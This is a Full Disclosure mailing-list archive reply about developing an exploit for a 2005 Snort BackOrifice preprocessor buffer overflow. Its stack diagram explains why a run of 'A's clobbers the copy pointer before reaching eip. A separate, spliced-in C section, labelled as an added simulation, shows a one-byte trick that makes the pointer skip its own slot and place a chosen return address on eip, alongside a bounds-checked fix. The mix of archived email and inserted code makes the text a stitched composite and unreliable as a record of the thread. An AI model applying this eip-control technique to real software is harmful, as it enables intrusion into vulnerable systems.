Full Disclosure mailing list archives
Re: Snort BackOrifice Fun
From: "Krpata, Tyler" <tkrpata () bjs com>
Date: Fri, 21 Oct 2005 17:22:03 -0400
> Attached some in-progress code for the snort bug, getting through the
> while() loop that modifies both 'i' and 'len' is annoying. Any ideas on
> making this more reliable? It works great on my -ggdb version, but
> runs off a page during a memcmp() on my normal binary.
The problem is that you reach a point (coincidentally a page before eip) where you start to clobber the pointer that is being used to copy your user data into memory. Once that happens you're no longer writing to the location you want to be writing to.

*****************************************
Bf???????  [41414141]  len
Bf???????  [41414141]  id
Bf???????  [41414141]  l
Bf???????  [41414141]  i
Bf???????  [41414141]  type
Bf???????  [Bf????41]  buf_ptr
Bf???????  [????????]
Bf???????  [????????]
Bf???????  [????????]  eip
*****************************************

Somewhere else...

Bf????41   [41414141]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
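The clobber the reply describes, as a constructed simulation added here; it is not Snort's code and not the attachment from the thread. The stack frame is an 80-byte array addressed by made-up 32-bit addresses based at FRAME_BASE (an assumed value, picked so that an 'A' landing in the pointer's low byte sends it below the frame, like the "Somewhere else..." line above). The offsets, the placeholder saved return address and the target address are all assumptions. The loop models `*buf_ptr = c; buf_ptr++;` as compiled without optimisation, where the pointer is reloaded from its stack slot for the increment, which is why one copied byte can redirect the rest of the copy. Beyond the diagnosis itself, it shows one way through the slot under that model (a single byte that makes the reloaded pointer skip over its own slot) and the defender-side fix (bound the copy by the destination buffer, not by the packet's length field).

```c
#include <stdint.h>
#include <string.h>

/* Constructed stack frame. Offsets mirror the sketch in the reply:
 *   0..31  buf (copy destination)     32..51  len, id, l, i, type
 *   52     buf_ptr (pointer written through)    56, 60  two saved words
 *   64     saved return address ("eip")
 * FRAME_BASE and OLD_EIP are made-up values for the simulation. */
#define FRAME_BASE 0xbfffe880u
#define FRAME_SIZE 80
#define BUF_OFF     0
#define BUF_SIZE   32
#define PTR_OFF    52
#define EIP_OFF    64
#define OLD_EIP    0x08048000u

struct sim {
    uint8_t  frame[FRAME_SIZE];
    int      stray;          /* bytes whose destination fell outside the frame */
    uint32_t clobbered_ptr;  /* buf_ptr right after a copied byte hit its slot */
};

static uint32_t ld32(const uint8_t *p) { uint32_t v; memcpy(&v, p, 4); return v; }
static void     st32(uint8_t *p, uint32_t v) { memcpy(p, &v, 4); }

/* Models `*buf_ptr = c; buf_ptr++;` built without optimisation: buf_ptr lives
 * in its stack slot and is reloaded from memory for the increment, so a byte
 * the copy writes into that slot survives and steers every later write.
 * There is no check against BUF_SIZE; that is the bug being simulated. */
static void vuln_copy(struct sim *s, const uint8_t *data, int len)
{
    memset(s, 0, sizeof *s);
    st32(s->frame + EIP_OFF, OLD_EIP);
    st32(s->frame + PTR_OFF, FRAME_BASE + BUF_OFF);        /* buf_ptr = buf */
    for (int i = 0; i < len; i++) {
        uint32_t dst = ld32(s->frame + PTR_OFF);
        uint32_t off = dst - FRAME_BASE;                   /* wraps if below frame */
        if (off < FRAME_SIZE)
            s->frame[off] = data[i];
        else
            s->stray++;                                    /* "somewhere else" */
        if (off >= PTR_OFF && off < PTR_OFF + 4)           /* did we just hit buf_ptr? */
            s->clobbered_ptr = ld32(s->frame + PTR_OFF);
        st32(s->frame + PTR_OFF, ld32(s->frame + PTR_OFF) + 1);   /* buf_ptr++ */
    }
}

/* The naive payload: a run of 'A's long enough to reach eip on paper.
 * After the copy, eip is still OLD_EIP: the first 'A' that lands on buf_ptr
 * turns it into 0xbfffe841 and every following byte leaves the frame. */
void run_naive(struct sim *s)
{
    uint8_t data[FRAME_SIZE];
    memset(data, 'A', sizeof data);
    vuln_copy(s, data, sizeof data);
}

/* One way through the slot under this model: the single byte that lands on
 * buf_ptr's low byte is set to low(&buf_ptr) + 3, so that after the
 * reload-and-increment buf_ptr == &buf_ptr + 4. The other three bytes of the
 * slot are never written (they already hold the right upper bytes) and the
 * copy resumes just past it. Assumes the frame's low address byte is known
 * and that adding 3 does not carry out of it. */
void run_skip(struct sim *s, uint32_t target)
{
    uint8_t data[65];
    memset(data, 'A', sizeof data);
    data[PTR_OFF] = (uint8_t)(((FRAME_BASE + PTR_OFF) & 0xffu) + 3);
    /* data[53..60] fill offsets 56..63; data[61..64] land on eip. */
    st32(data + 53 + (EIP_OFF - (PTR_OFF + 4)), target);
    vuln_copy(s, data, sizeof data);
}

/* Defender-side fix: bound the copy by the destination buffer, not by the
 * length claimed in the packet. Returns -1 and copies nothing when the
 * packet claims more than fits. */
int safe_copy(struct sim *s, const uint8_t *data, int len)
{
    if (len < 0 || len > BUF_SIZE)
        return -1;
    memset(s, 0, sizeof *s);
    st32(s->frame + EIP_OFF, OLD_EIP);
    memcpy(s->frame + BUF_OFF, data, (size_t)len);
    return len;
}

uint32_t saved_eip(const struct sim *s) { return ld32(s->frame + EIP_OFF); }
```

The skip relies on the low byte of the pointer's slot address being stable between runs; on a 2005-era Linux without stack randomisation that was usually true, and it is the kind of fact a -ggdb build and a stripped build can disagree on once the frame layout shifts.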
Current thread:
- Snort BackOrifice Fun H D Moore (Oct 19)
- <Possible follow-ups>
- Re: Snort BackOrifice Fun Krpata, Tyler (Oct 21)
